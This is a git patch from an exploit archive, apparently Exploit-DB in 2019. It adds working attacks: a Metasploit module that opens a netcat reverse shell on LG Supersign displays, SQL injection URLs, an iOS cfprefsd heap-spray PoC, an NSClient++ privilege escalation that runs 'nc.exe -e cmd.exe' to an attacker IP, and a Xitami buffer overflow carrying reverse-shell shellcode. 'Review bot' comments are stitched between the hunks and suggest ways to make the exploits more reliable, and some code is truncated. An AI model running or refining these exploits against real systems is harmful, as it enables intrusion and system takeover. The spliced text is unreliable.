From 79a9df09f0adfe80975ee9b53ab0f8db8f8de414 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 7 May 2019 05:01:58 +0000 Subject: [PATCH] DB: 2019-05-07 13 changes to exploits/shellcodes iOS 12.1.3 - 'cfprefsd' Memory Corruption Windows PowerShell ISE - Remote Code Execution NSClient++ 0.5.2.35 - Privilege Escalation Windows PowerShell ISE - Remote Code Execution LG Supersign EZ CMS - Remote Code Execution (Metasploit) Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter) ReadyAPI 2.5.0 / 2.6.0 - Remote Code Execution PHPads 2.0 - 'click.php3?bannerID' SQL Injection microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes) Linux/x86 - shred file Shellcode (72 bytes) --- exploits/asp/webapps/46799.txt | 28 ++++ exploits/hardware/remote/46795.rb | 72 ++++++++ exploits/hardware/webapps/46240.html | 2 +- exploits/ios/dos/46803.c | 165 +++++++++++++++++++ exploits/multiple/webapps/46796.txt | 96 +++++++++++ exploits/php/webapps/46798.txt | 56 +++++++ exploits/windows/local/46802.txt | 63 +++++++ exploits/windows/{local => remote}/46790.txt | 0 exploits/windows/remote/46797.py | 125 ++++++++++++++ files_exploits.csv | 9 +- files_shellcodes.csv | 2 + shellcodes/generator/46800.txt | 139 ++++++++++++++++ shellcodes/linux_x86/46801.txt | 76 +++++++++ 13 files changed, 831 insertions(+), 2 deletions(-) create mode 100644 exploits/asp/webapps/46799.txt create mode 100755 exploits/hardware/remote/46795.rb create mode 100644 exploits/ios/dos/46803.c create mode 100644 exploits/multiple/webapps/46796.txt create mode 100644 exploits/php/webapps/46798.txt create mode 100644 exploits/windows/local/46802.txt rename exploits/windows/{local => remote}/46790.txt (100%) create mode 100755 exploits/windows/remote/46797.py create mode 100644 shellcodes/generator/46800.txt create mode 100644 shellcodes/linux_x86/46801.txt 
diff --git a/exploits/asp/webapps/46799.txt b/exploits/asp/webapps/46799.txt new file mode 100644 index 000000000..efa4deff1 --- /dev/null +++ b/exploits/asp/webapps/46799.txt @@ -0,0 +1,28 @@ +[+] Sql Injection on microASP (Portal+) CMS + +[+] Date: 05/05/2019 + +[+] Risk: High + +[+] CWE Number : CWE-89 + +[+] Author: Felipe Andrian Peixoto + +[+] Vendor Homepage: http://www.microasp.it/ + +[+] Contact: felipe_andrian@hotmail.com + +[+] Tested on: Windows 7 and Gnu/Linux + +[+] Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;) + +[+] Exploit : + + http://host/patch/pagina.phtml?explode_tree= [SQL Injection] + +[+] PoC : + + https://server/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+- + https://server/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- + +[+] EOF \ No newline at end of file diff --git a/exploits/hardware/remote/46795.rb b/exploits/hardware/remote/46795.rb new file mode 100755 index 000000000..a33952033 --- /dev/null +++ b/exploits/hardware/remote/46795.rb 
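Review bot: The advisory names no affected microASP (Portal+) version and no vendor notification or fix status, so this entry cannot be matched to a patched build; `[+] Version:` and `[+] Vendor notified:` lines should be added next to `[+] Risk: High`. The PoC relies on MySQL's `extractvalue()` error-based technique wrapped in `/*!50000 */` version comments, so it only demonstrates the injection on a MySQL 5.0+ backend that echoes database errors into the page — the `.phtml` front end says nothing about the database, and that assumption belongs under `[+] PoC`. Minor: `http://host/patch/pagina.phtml` in the Exploit line should read `path`.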
@@ -0,0 +1,72 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +class MetasploitModule < Msf::Exploit::Remote + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'LG Supersign EZ CMS RCE', + 'Description' => %q{ + LG SuperSignEZ CMS, that many LG SuperSign TVs have builtin, is prone + to remote code execution due to an improper parameter handling + }, + 'Author' => ['Alejandro Fanjul'], + 'References' => + [ + [ 'CVE', '2018-17173' ], + [ 'URL', 'https://mamaquieroserpentester.blogspot.com/2018/09/lg-supersign-rce-to-luna-and-back-to.html'] + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Privileged' => false, + 'DefaultOptions' => + { + 'PAYLOAD' => 'cmd/unix/reverse_netcat' + }, + 'Arch' => ARCH_CMD, + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'netcat' + } + }, + 'Targets' => + [ + [ 'Automatic Target', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Sep 21 2018' + ) + ) + register_options( + [ + OptString.new('RPORT',[true,'Target port','9080']) + ], self.class) + + end + + + def exploit + lhost=datastore['LHOST'] + lport=datastore['LPORT'] + #uri = target_uri.path + cmd = Rex::Text.uri_encode(payload.encoded) + connect + res = send_request_raw({ + 'method'=>'GET', + 'uri'=>"/qsr_server/device/getThumbnail?sourceUri='%20-;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20"+lhost+"%20"+lport.to_s+"%20%3E%2Ftmp%2Ff;'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&_=1537275717150" + + }) + handler + disconnect + + end + +end \ No newline at end of file diff --git a/exploits/hardware/webapps/46240.html b/exploits/hardware/webapps/46240.html index 39de03d31..c33e8aecf 100644 --- a/exploits/hardware/webapps/46240.html +++ b/exploits/hardware/webapps/46240.html 
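Review bot: `cmd = Rex::Text.uri_encode(payload.encoded)` in `exploit` is computed and never used — the `'uri'` string hard-codes its own `rm/mkfifo/nc` reverse shell built from `LHOST`/`LPORT`, so the `Payload` compat block is decorative and any payload other than `cmd/unix/reverse_netcat` is silently dropped while `handler` waits for a session that payload never produces. Injecting the encoded payload keeps the module honest: `'uri' => "/qsr_server/device/getThumbnail?sourceUri='%20-;#{cmd};'&targetUri=%2Ftmp%2Fthumb%2Ftest.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop"`. The port should also be declared with the framework's port option, `Opt::RPORT(9080)`, rather than `OptString.new('RPORT', ...)`, so `rport` carries an integer as the rest of `HttpClient` expects. The explicit `connect`/`disconnect` around `send_request_raw` is redundant since the mixin manages the connection itself, though it is harmless.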
@@ -4,7 +4,7 @@ # Tested on: Windows 10 x64 # CVE : CVE-2019-6710 # Author : Ali Can Gönüllü -# Twitter : @god3err +# Twitter : @alicangonullu Exploits : --> diff --git a/exploits/ios/dos/46803.c b/exploits/ios/dos/46803.c new file mode 100644 index 000000000..21a14958f --- /dev/null +++ b/exploits/ios/dos/46803.c 
@@ -0,0 +1,165 @@ +// (c) 2019 ZecOps, Inc. - https://www.zecops.com - Find Attackers' Mistakes +// Intended only for educational and defensive purposes only. +// Use at your own risk. + +#include +#import +#include +#include +#include +#include +#include + +#define AGENT 1 + +#define FILL_DICT_COUNT 0x600 +#define FILL_COUNT 0x1000 +#define FREE_COUNT 0x2000 +#define FILL_SIZE (0xc0) + +int need_stop = 0; + +struct heap_spray { + void* fake_objc_class_ptr; + uint32_t r10; + uint32_t r4; + void* fake_sel_addr; + uint32_t r5; + uint32_t r6; + uint64_t cmd; + uint8_t pad1[0x3c]; + uint32_t stack_pivot; + struct fake_objc_class_t { + char pad[0x8]; + void* cache_buckets_ptr; + uint32_t cache_bucket_mask; + } fake_objc_class; + struct fake_cache_bucket_t { + void* cached_sel; + void* cached_function; + } fake_cache_bucket; + char command[32]; +}; + +void fill_once(){ + +#if AGENT + xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0); +#else + xpc_connection_t client = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); +#endif + + xpc_connection_set_event_handler(client, ^void(xpc_object_t response) { + xpc_type_t t = xpc_get_type(response); + if (t == XPC_TYPE_ERROR){ + printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION)); + need_stop = 1 ; + } + //printf("received an event\n"); + }); + + xpc_connection_resume(client); + xpc_object_t main_dict = xpc_dictionary_create(NULL, NULL, 0); + + xpc_object_t arr = xpc_array_create(NULL, 0); + + xpc_object_t spray_dict = xpc_dictionary_create(NULL, NULL, 0); + xpc_dictionary_set_int64(spray_dict, "CFPreferencesOperation", 8); + xpc_dictionary_set_string(spray_dict, "CFPreferencesDomain", "xpc_str_domain"); + xpc_dictionary_set_string(spray_dict, "CFPreferencesUser", "xpc_str_user"); + + char key[100]; + char value[FILL_SIZE]; + memset(value, "A", FILL_SIZE); + *((uint64_t *)value) = 0x4142010180202020; + 
//*((uint64_t *)value) = 0x180202020; + value[FILL_SIZE-1]=0; + for (int i=0; inull0 = 0; + hs->cmd = -1; + hs->fake_objc_class_ptr = &hs->fake_objc_class; + hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket; + hs->fake_objc_class.cache_bucket_mask = 0; + hs->fake_sel_addr = &hs->fake_cache_bucket.cached_sel; + // nasty hack to find the correct selector address + hs->fake_cache_bucket.cached_sel = 0x7fff00000000 + (uint64_t)NSSelectorFromString(@"dealloc"); + + hs->fake_cache_bucket.cached_function = 0xdeadbeef; + size_t heap_spray_pages = 0x40000; + size_t heap_spray_bytes = heap_spray_pages * 0x1000; + char* heap_spray_copies = malloc(heap_spray_bytes); + for (int i = 0; i < heap_spray_pages; i++){ + memcpy(heap_spray_copies+(i*0x1000), map, 0x1000); + } + xpc_dictionary_set_data(main_dict, "heap_spray", heap_spray_copies, heap_spray_bytes); + + //NSLog(@"%@", main_dict); + xpc_connection_send_message(client, main_dict); + printf("fill once\n"); + xpc_release(main_dict); +} + +void trigger_vul(){ + #if AGENT + printf("AGENT\n"); + xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.agent",0,0); + #else + printf("DAEMON\n"); + xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.cfprefsd.daemon",0,XPC_CONNECTION_MACH_SERVICE_PRIVILEGED); + #endif + xpc_connection_set_event_handler(conn, ^(xpc_object_t response) { + xpc_type_t t = xpc_get_type(response); + if (t == XPC_TYPE_ERROR){ + printf("err: %s\n", xpc_dictionary_get_string(response, XPC_ERROR_KEY_DESCRIPTION)); + need_stop = 1 ; + } + }); + xpc_connection_resume(conn); + + xpc_object_t hello = xpc_dictionary_create(NULL, NULL, 0); + xpc_object_t arr = xpc_array_create(NULL, 0); + + xpc_object_t arr_free = xpc_dictionary_create(NULL, NULL, 0); + xpc_dictionary_set_int64(arr_free, "CFPreferencesOperation", 4); + xpc_array_append_value(arr, arr_free); + for (int i=0; i https://twitter.com/gscamelo +# Vendor Homepage: https://smartbear.com/product/ready-api 
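Review bot: `memset(value, "A", FILL_SIZE);` in `fill_once` passes a string literal where a byte value is expected, so the pointer is narrowed to `int` and the buffer is filled with the low byte of the literal's address rather than 0x41 — the only bytes placed deliberately are the `*((uint64_t *)value)` overwrite and the trailing NUL; it should read `memset(value, 'A', FILL_SIZE);`. The `malloc(heap_spray_bytes)` of 0x40000 pages (1 GiB) later in the same function is never checked before the `memcpy` loop, so on a memory-constrained device a NULL return crashes the PoC itself; `if (!heap_spray_copies) return;` is worth adding. `need_stop` is assigned from inside the XPC event-handler blocks, which run on a dispatch queue, and is presumably polled elsewhere (not visible in this hunk), so it should be declared `volatile` or `_Atomic` to be a reliable stop flag. The loop bodies after `for (int i=0; i` appear truncated by HTML extraction in this copy, so those lines cannot be reviewed here.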
+# Software Link: https://smartbear.com/product/ready-api/overview/ +# Github: https://github.com/gscamelo/CVE-2018-20580 +# Version: 2.5.0 and 2.6.0 +# Tested on: Windows +# CVE : CVE-2018-20580 + +I found a new vulnerability in the (ReadyAPI). It allows an attacker to +execute a remote code on the local machine putting in danger the ReadyAPI +users including developers, pentesters, etc... + +The ReadyAPI allows users to open a SOAP project and import WSDL files that +help the users to communicate with the remote server easily. + +The WSDL file owner can determine default values of some parameters. An +attacker can impersonate a legitimate web service and inject a malicious +code into a default value of one of the parameters and spread it to +ReadyAPI clients. + +When a ReadyAPI client load a malicious WSDL file to his project and send a +request containing the malicious code the ReadyAPI will execute the +malicious code on the victim's computer. + +The attack scenario: + +An attacker impersonates a regular web service with a WSDL containing the +malicious code. +The victim creates a new project in the ReadyAPI and loads the malicious +WSDL File. +The victim decides to send a request to the remote server and the ReadyAPI +execute the malicious code. +The attacker succeeds in executing malicious code in the victim's machine +and take it over. +--> + + + + + + + + + + + + + + + + + + + + + + + Create a new xpl + + + + + + + + + + + + + + + + + + + + My first Exploit + + + + + + \ No newline at end of file diff --git a/exploits/php/webapps/46798.txt b/exploits/php/webapps/46798.txt new file mode 100644 index 000000000..909496bd0 --- /dev/null +++ b/exploits/php/webapps/46798.txt 
@@ -0,0 +1,56 @@ +[+] Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores + +[+] Date: 05/05/2019 + +[+] Risk: High + +[+] CWE Number : CWE-89 + +[+] Author: Felipe Andrian Peixoto + +[+] Vendor Homepage: https://blondish.net/ + +[+] Software Demo : https://github.com/blondishnet/PHPads/blob/master/readme.txt + +[+] Contact: felipe_andrian@hotmail.com + +[+] Tested on: Windows 7 and Gnu/Linux + +[+] Dork: inurl:"click.php3?bannerID="" // use your brain ;) + +[+] Exploit : + + http://host/patch//click.php3?bannerID= [SQL Injection] + +[+] Vulnerable File : + + + +[+] PoC : + + http://server/phpads/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- + http:/server/phpAds/click.php3?bannerID=-1/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+- + +[+] EOF \ No newline at end of file diff --git a/exploits/windows/local/46802.txt b/exploits/windows/local/46802.txt new file mode 100644 index 000000000..ed4f283d8 --- /dev/null +++ b/exploits/windows/local/46802.txt 
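Review bot: The `[+] Vulnerable File :` section is empty in this hunk, so the entry never shows which statement in `click.php3` concatenates `bannerID` into the query — the excerpt was probably stripped on extraction, and the patch should carry at least that query line so the CWE-89 claim can be checked against the source. No affected-version boundary beyond "2.0" and no vendor response are given either. Minor: the dork carries a doubled quote (`inurl:"click.php3?bannerID="`), the Exploit URL `http://host/patch//click.php3` should be `path/`, and the second PoC is missing a slash in `http:/server/`.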
@@ -0,0 +1,63 @@ +Exploit Author: bzyo +Twitter: @bzyo_ +Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation +Date: 05-05-19 +Vulnerable Software: NSClient++ 0.5.2.35 +Vendor Homepage: http://nsclient.org/ +Version: 0.5.2.35 +Software Link: http://nsclient.org/download/ +Tested on: Windows 10 x64 + +Details: +When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administator's password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted. + +The user is able to enable the modules to check external scripts and schedule those scripts to run. There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere. Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation. A reboot, as far as I can tell, is required to reload and read the changes to the web config. + +Prerequisites: +To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system. + +Exploit: +1. Grab web administrator password +- open c:\program files\nsclient++\nsclient.ini +or +- run the following that is instructed when you select forget password + C:\Program Files\NSClient++>nscp web -- password --display + Current password: SoSecret + +2. Login and enable following modules including enable at startup and save configuration +- CheckExternalScripts +- Scheduler + +3. Download nc.exe and evil.bat to c:\temp from attacking machine + @echo off + c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe + +4. Setup listener on attacking machine + nc -nlvvp 443 + +5. 
Add script foobar to call evil.bat and save settings +- Settings > External Scripts > Scripts +- Add New + - foobar + command = c:\temp\evil.bat + +6. Add schedulede to call script every 1 minute and save settings +- Settings > Scheduler > Schedules +- Add new + - foobar + interval = 1m + command = foobar + +7. Restart the computer and wait for the reverse shell on attacking machine + nc -nlvvp 443 + listening on [any] 443 ... + connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671 + Microsoft Windows [Version 10.0.17134.753] + (c) 2018 Microsoft Corporation. All rights reserved. + + C:\Program Files\NSClient++>whoami + whoami + nt authority\system + +Risk: +The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System \ No newline at end of file diff --git a/exploits/windows/local/46790.txt b/exploits/windows/remote/46790.txt similarity index 100% rename from exploits/windows/local/46790.txt rename to exploits/windows/remote/46790.txt diff --git a/exploits/windows/remote/46797.py b/exploits/windows/remote/46797.py new file mode 100755 index 000000000..05ba4e2b0 --- /dev/null +++ b/exploits/windows/remote/46797.py 
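Review bot: The claim in step 1 that a low-privileged user can read `c:\program files\nsclient++\nsclient.ini` is never substantiated — the write-up shows no file ACL, yet that readability is the property the whole chain rests on, so the `Details:` section should record the permissions observed (the `icacls` output for that file). A `Mitigation:` section is also missing; from what the text itself describes — cleartext web password in the config, `CheckExternalScripts` plus `Scheduler` executing as Local System — the practical controls are restricting NTFS permissions on `nsclient.ini`, disabling the Web Server module or binding it to localhost, and leaving external scripts disabled. The prerequisite "ability to reboot the system" is presumably stronger than needed, since the text's own observation is only that a reboot re-reads the config; any later reboot (patching, power loss) would do, which is worth stating in `Prerequisites:`.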
@@ -0,0 +1,125 @@ +# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (SEH + Egghunter) +# Date: May 4, 2019 +# Author: ElSoufiane +# Version: 2.5b4 +# Tested on: Windows Vista Ultimate (Build 6000) and Windows XP SP3 Professional +# Discovered by: Krystian Kloskowski +# +# Set up a multi handler listener in MSFConsole +# then run exploit +# +# root@f6c9fa91b403:~/XitamiWebServer# python exploit.py 192.168.1.149 +# [+] Sending exploit payload... +# +# Check the MSFConsole listener +# +# msf5 exploit(multi/handler) > run +# [*] Started reverse TCP handler on 0.0.0.0:5801 +# [*] Encoded stage with x86/shikata_ga_nai +# [*] Sending encoded stage (267 bytes) to 172.17.0.1 +# [*] Command shell session 6 opened (172.17.0.2:5801 -> 172.17.0.1:39416) at 2019-05-04 00:17:55 +0000 + + + +# C:\Xitami> + +import socket +import sys +import struct + +if len(sys.argv) != 2 : + print "[+] Usage : python exploit.py [VICTIM_IP]" + exit(0) + +TCP_IP = sys.argv[1] +TCP_PORT = 80 + + +egg = "SOUFSOUF" +nops = "\x90"*10 + +#msfvenom -p windows/shell/reverse_tcp LPORT=5801 LHOST=192.168.1.129 -f python -v shellcode -e x86/alpha_mixed +shellcode = "\x89\xe0\xd9\xe5\xd9\x70\xf4\x5b\x53\x59\x49\x49" +shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43" +shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" +shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +shellcode += "\x69\x6c\x68\x68\x6c\x42\x63\x30\x37\x70\x63\x30" +shellcode += "\x51\x70\x6b\x39\x6d\x35\x70\x31\x6f\x30\x70\x64" +shellcode += "\x4e\x6b\x76\x30\x70\x30\x4e\x6b\x76\x32\x54\x4c" +shellcode += "\x6e\x6b\x72\x72\x46\x74\x6c\x4b\x53\x42\x55\x78" +shellcode += "\x34\x4f\x4e\x57\x42\x6a\x35\x76\x30\x31\x59\x6f" +shellcode += "\x4e\x4c\x77\x4c\x70\x61\x31\x6c\x75\x52\x34\x6c" +shellcode += "\x35\x70\x6b\x71\x38\x4f\x56\x6d\x47\x71\x4a\x67" +shellcode += "\x4a\x42\x49\x62\x63\x62\x63\x67\x6e\x6b\x63\x62" +shellcode += 
"\x52\x30\x4c\x4b\x53\x7a\x77\x4c\x6e\x6b\x70\x4c" +shellcode += "\x72\x31\x31\x68\x59\x73\x30\x48\x53\x31\x68\x51" +shellcode += "\x72\x71\x4e\x6b\x30\x59\x57\x50\x55\x51\x6e\x33" +shellcode += "\x4c\x4b\x73\x79\x72\x38\x48\x63\x56\x5a\x62\x69" +shellcode += "\x4c\x4b\x66\x54\x6c\x4b\x73\x31\x49\x46\x64\x71" +shellcode += "\x4b\x4f\x6c\x6c\x5a\x61\x68\x4f\x66\x6d\x77\x71" +shellcode += "\x69\x57\x30\x38\x4b\x50\x74\x35\x58\x76\x55\x53" +shellcode += "\x71\x6d\x6b\x48\x55\x6b\x73\x4d\x44\x64\x32\x55" +shellcode += "\x4a\x44\x43\x68\x4c\x4b\x70\x58\x31\x34\x65\x51" +shellcode += "\x4a\x73\x62\x46\x4e\x6b\x54\x4c\x52\x6b\x6e\x6b" +shellcode += "\x33\x68\x37\x6c\x43\x31\x4b\x63\x6e\x6b\x34\x44" +shellcode += "\x6c\x4b\x43\x31\x4a\x70\x4c\x49\x37\x34\x37\x54" +shellcode += "\x44\x64\x51\x4b\x73\x6b\x53\x51\x52\x79\x52\x7a" +shellcode += "\x42\x71\x6b\x4f\x69\x70\x71\x4f\x43\x6f\x32\x7a" +shellcode += "\x4c\x4b\x37\x62\x7a\x4b\x4e\x6d\x71\x4d\x55\x38" +shellcode += "\x56\x53\x70\x32\x77\x70\x65\x50\x62\x48\x44\x37" +shellcode += "\x42\x53\x74\x72\x63\x6f\x43\x64\x33\x58\x42\x6c" +shellcode += "\x63\x47\x31\x36\x54\x47\x6d\x59\x6b\x58\x69\x6f" +shellcode += "\x4e\x30\x4e\x58\x4c\x50\x67\x71\x47\x70\x67\x70" +shellcode += "\x37\x59\x4a\x64\x31\x44\x56\x30\x70\x68\x55\x79" +shellcode += "\x4f\x70\x30\x6b\x63\x30\x6b\x4f\x68\x55\x61\x7a" +shellcode += "\x35\x5a\x72\x48\x39\x50\x79\x38\x45\x51\x4f\x71" +shellcode += "\x52\x48\x46\x62\x43\x30\x32\x36\x39\x39\x6c\x49" +shellcode += "\x59\x76\x36\x30\x46\x30\x36\x30\x32\x70\x51\x50" +shellcode += "\x36\x30\x67\x30\x76\x30\x32\x48\x6a\x4a\x56\x6f" +shellcode += "\x79\x4f\x39\x70\x59\x6f\x79\x45\x5a\x37\x70\x6a" +shellcode += "\x46\x70\x71\x46\x63\x67\x30\x68\x6e\x79\x69\x35" +shellcode += "\x44\x34\x30\x61\x59\x6f\x59\x45\x6d\x55\x49\x50" +shellcode += "\x53\x44\x55\x5a\x79\x6f\x30\x4e\x66\x68\x53\x45" +shellcode += "\x6a\x4c\x6a\x48\x52\x47\x73\x30\x33\x30\x73\x30" +shellcode += 
"\x61\x7a\x55\x50\x33\x5a\x67\x74\x71\x46\x66\x37" +shellcode += "\x62\x48\x45\x52\x68\x59\x4f\x38\x51\x4f\x59\x6f" +shellcode += "\x6b\x65\x4f\x73\x7a\x58\x53\x30\x63\x4e\x57\x46" +shellcode += "\x4c\x4b\x35\x66\x32\x4a\x63\x70\x72\x48\x63\x30" +shellcode += "\x76\x70\x65\x50\x77\x70\x73\x66\x62\x4a\x37\x70" +shellcode += "\x32\x48\x46\x38\x4e\x44\x76\x33\x79\x75\x79\x6f" +shellcode += "\x5a\x75\x6e\x73\x76\x33\x52\x4a\x73\x30\x76\x36" +shellcode += "\x42\x73\x32\x77\x33\x58\x45\x52\x78\x59\x78\x48" +shellcode += "\x61\x4f\x39\x6f\x59\x45\x4d\x53\x49\x68\x45\x50" +shellcode += "\x73\x4d\x61\x38\x71\x48\x62\x48\x55\x50\x53\x70" +shellcode += "\x35\x50\x53\x30\x33\x5a\x45\x50\x76\x30\x33\x58" +shellcode += "\x56\x6b\x34\x6f\x46\x6f\x34\x70\x4b\x4f\x78\x55" +shellcode += "\x71\x47\x75\x38\x31\x65\x70\x6e\x52\x6d\x50\x61" +shellcode += "\x4b\x4f\x79\x45\x33\x6e\x31\x4e\x4b\x4f\x44\x4c" +shellcode += "\x76\x44\x56\x6f\x4e\x65\x72\x50\x79\x6f\x69\x6f" +shellcode += "\x6b\x4f\x68\x69\x4d\x4b\x79\x6f\x79\x6f\x49\x6f" +shellcode += "\x56\x61\x5a\x63\x71\x39\x69\x56\x51\x65\x69\x51" +shellcode += "\x4f\x33\x6d\x6b\x5a\x50\x68\x35\x4e\x42\x50\x56" +shellcode += "\x52\x4a\x57\x70\x36\x33\x69\x6f\x5a\x75\x41\x41" + +egghunter ="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"+"SOUF"+"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + +nseh_jmp = "\xeb\xaa" #jmp back 84 bytes +seh = "\x87\x1d\x40" # (xiwin32.exe) 0x00401d87 -> pop/pop/ret. ( Parial Overwrite ) + +payload = "A"*120 +payload += egghunter +payload += "A"*(190-len(payload)) +payload += nseh_jmp +payload += seh + +http_req = "GET / HTTP/1.1\r\n" +http_req += "Host: "+ TCP_IP +"\r\n" +http_req += "User-Agent: "+egg+nops+shellcode+"\r\n" +http_req += "If-Modified-Since: Wed, " + payload + "\r\n\r\n" + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((TCP_IP, TCP_PORT)) +print "[+] Sending exploit payload..." +s.send(http_req) +s.close() \ No newline at end of file 
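Review bot: `s.send(http_req)` at the end of the script can return after a partial send and the count is never checked, and no timeout is set, so a filtered port leaves `connect` hanging indefinitely; use `s.settimeout(10)` before `s.connect(...)` and `s.sendall(http_req)` in place of `send`. The embedded shellcode was generated for `LHOST=192.168.1.129` / `LPORT=5801` (per the msfvenom comment) while the listener transcript shows a different address, so the header should say the payload must be regenerated for the operator's LHOST/LPORT before use. The script is Python 2 only (`print` statements, `str` sent as bytes); a `#!/usr/bin/env python2` line would make that explicit.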
diff --git a/files_exploits.csv b/files_exploits.csv index 286762240..886dff79b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6408,6 +6408,7 @@ id,file,description,date,author,type,platform,port 46778,exploits/windows/dos/46778.py,"SpotAuditor 5.2.6 - 'Name' Denial of Service (PoC)",2019-04-30,"Victor Mondragón",dos,windows, 46781,exploits/linux/dos/46781.txt,"Linux - Missing Locking Between ELF coredump code and userfaultfd VMA Modification",2019-04-30,"Google Security Research",dos,linux, 46793,exploits/windows/dos/46793.txt,"SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service",2019-05-03,"Dino Barlattani",dos,windows, +46803,exploits/ios/dos/46803.c,"iOS 12.1.3 - 'cfprefsd' Memory Corruption",2019-05-06,ZecOps,dos,ios, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
@@ -10451,7 +10452,7 @@ id,file,description,date,author,type,platform,port 46755,exploits/windows/local/46755.py,"Lavavo CD Ripper 4.20 - 'License Activation Name' Buffer Overflow (SEH)",2019-04-25,Achilles,local,windows, 46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows, 46779,exploits/windows/local/46779.py,"DeviceViewer 3.12.0.1 - 'user' SEH Overflow",2019-04-30,"Hayden Wright",local,windows, -46790,exploits/windows/local/46790.txt,"Windows PowerShell ISE - Remote Code Execution",2019-05-03,hyp3rlinx,local,windows, +46802,exploits/windows/local/46802.txt,"NSClient++ 0.5.2.35 - Privilege Escalation",2019-05-06,bzyo,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
@@ -17377,7 +17378,10 @@ id,file,description,date,author,type,platform,port 46782,exploits/windows/remote/46782.rb,"AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)",2019-04-30,Metasploit,remote,windows, 46783,exploits/php/remote/46783.rb,"Pimcore < 5.71 - Unserialize RCE (Metasploit)",2019-04-30,Metasploit,remote,php, 46785,exploits/linux/remote/46785.rb,"Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)",2019-05-02,Metasploit,remote,linux,3000 +46790,exploits/windows/remote/46790.txt,"Windows PowerShell ISE - Remote Code Execution",2019-05-03,hyp3rlinx,remote,windows, 46792,exploits/linux/remote/46792.py,"Blue Angel Software Suite - Command Execution",2019-05-03,"Paolo Serracino_ Pietro Minniti_ Damiano Proietti",remote,linux, +46795,exploits/hardware/remote/46795.rb,"LG Supersign EZ CMS - Remote Code Execution (Metasploit)",2019-05-06,"Alejandro Fanjul",remote,hardware,9080 +46797,exploits/windows/remote/46797.py,"Xitami Web Server 2.5 - Remote Buffer Overflow (SEH + Egghunter)",2019-05-06,ElSoufiane,remote,windows,80 